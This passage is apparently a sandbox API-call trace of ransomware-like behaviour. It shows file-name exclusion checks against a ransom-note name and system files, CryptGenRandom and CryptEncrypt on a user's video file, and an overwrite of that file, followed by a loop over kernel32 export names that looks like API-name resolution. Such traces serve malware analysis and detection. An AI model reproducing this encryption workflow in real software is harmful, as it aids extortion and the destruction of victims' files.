dwReserved0=0x0, dwReserved1=0x0, cFileName="ind-.avi", cAlternateFileName="")) returned 1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="DECRYPT-FILES.txt") returned 1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="autorun.inf") returned 1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="boot.ini") returned 1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="desktop.ini") returned 1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="ntuser.dat") returned -1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="iconcache.db") returned 1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="bootsect.bak") returned 1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="ntuser.dat.log") returned -1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="thumbs.db") returned -1 [0087.375] lstrcmpiW (lpString1="ind-.avi", lpString2="Bootfont.bin") returned 1 [0087.375] lstrlenW (lpString="ind-.avi") returned 8 [0087.375] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0087.375] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0087.375] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0087.375] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0087.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.375] lstrlenW (lpString="ind-.avi") returned 8 [0087.375] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.375] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="ind-.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi" [0087.375] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ind-.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.376] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=30077) returned 1 [0087.376] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.376] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.376] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.376] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.376] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.376] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.376] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.377] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.377] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.378] CloseHandle (hObject=0x42c) returned 1 [0087.378] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.378] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.379] CloseHandle (hObject=0x0) returned 0 [0087.379] CloseHandle (hObject=0x428) returned 1 [0087.379] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.379] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.379] GetTickCount () returned 0x114e4a5 [0087.379] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.379] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.379] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.380] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.380] lstrlenA (lpString="kernel32.dll") returned 12 [0087.380] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.380] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.380] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.380] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.380] lstrlenA (lpString="ADDATOMA") returned 8 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.380] lstrlenA (lpString="ADDATOMW") returned 8 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.380] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.380] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.380] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.381] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.381] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.381] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.381] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.381] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.381] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.381] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.381] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.381] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.381] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.381] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.381] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.381] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.381] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.381] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.381] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.381] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.381] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.382] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.382] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.382] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.382] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.382] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.382] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.382] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.382] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.382] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.382] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.382] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.382] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.382] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.382] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.382] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.382] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.382] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.382] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.382] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.383] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.383] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.383] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.383] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.383] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.383] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.383] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.383] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.383] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.383] lstrlenA (lpString="BEEP") returned 4 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.383] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.383] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.383] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.383] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.383] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.383] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.383] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.383] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.384] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.384] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.384] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.384] lstrlenA (lpString="CANCELIO") returned 8 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.384] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.384] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.384] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.384] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.384] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.384] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.384] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.384] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.384] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.384] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.384] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.384] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.384] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.384] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.384] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.385] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.385] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.385] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.385] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.385] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.385] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.385] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.385] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.385] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.385] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.385] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.385] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.385] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" 